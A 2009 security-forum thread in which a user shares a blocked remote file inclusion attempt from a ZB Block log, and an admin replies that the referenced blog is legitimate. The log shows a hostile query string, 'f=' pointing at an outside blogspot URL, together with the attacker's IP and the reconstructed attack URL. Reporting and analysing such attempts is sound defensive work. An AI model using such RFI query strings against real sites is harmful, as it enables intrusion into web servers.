Adware, malware, spyware, hijacker discussion and information

[Gain Knowledge]  [Install Prevention]  [Maintain Security]  [Spyware Removal Help]


It is currently Wed Jun 19, 2013 1:13 am

Board index » HiJackThis! Log Assessment-Spyware Help » TeMerc Test Box

All times are UTC - 7 hours




Post new topic Reply to topic  Page 1 of 1
  [ 2 posts ] 
  Print view Previous topic | Next topic 
Author Message
zaphod
 Post subject: Strange RFI attempt
PostPosted: Sun Nov 08, 2009 6:54 pm 
Offline
User avatar

Joined: Fri Sep 04, 2009 5:53 am
Posts: 100
Location: Casper, WY
For lack of a better forum to put it in, I have a strange Remote file inclusion attempt I would like to share with you all.

If any mod knows a better forum on here for this message, please move it.

Here's the RFI I got...
Code:
#: 13724 @: Sun,  8 Nov 2009 17:54:35 -0700
Host: host49-175-dynamic.61-82-r.retail.telecomitalia.it
IP: 82.61.175.49
Score: 3
Why blocked: Question mark at end of query. RFI (http). Spammer tolerant host network.
Query: f=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html?
Referer:
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9
Reconstructed URL: http:// www.spambotsecurity.c0m /forum/viewtopic.php?f=http://owned-nets.blogspot.com/2009/05/pro0f3th1sddbluelinebe.html?
I checked out the page on blogspot, but saw no hostile code on it, well, none that immediately caught my eye. Does anyone see hostile crap buried in there? Could this be a slandering attempt against that page?

Zap hm? (Feeling a little amused, and a little unsure.)

_________________
Get Protected, Stay Protected...
SpambotSecurity.com , The home of ZB Block


IP:
top
Top
 Profile Send private message  
 
MysteryFCM
 Post subject: Re: Strange RFI attempt
PostPosted: Mon Nov 09, 2009 11:01 am 
Offline
Site Admin
Site Admin
User avatar

Joined: Sun May 15, 2005 12:42 pm
Posts: 3694
Location: Newcastle, UK
The blog is legit. It's entirely possible they're pulling the code from his post, but more likely they're just trying to fool people into thinking he's involved.

_________________
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

Keeping it FREE!


IP:
top
Top
 Profile Send private message  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 2 posts ] 

Board index » HiJackThis! Log Assessment-Spyware Help » TeMerc Test Box

All times are UTC - 7 hours


Who is online

Users browsing this forum: No registered users and 1 guest

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  

Who is online
Who is online In total there is 1 user online :: 0 registered, 0 hidden and 1 guest (based on users active over the past 5 minutes)
Most users ever online was 282 on Tue Sep 25, 2012 11:30 am

Users browsing this forum: No registered users and 1 guest

New posts    No new posts    Forum locked
cron
Powered by phpBB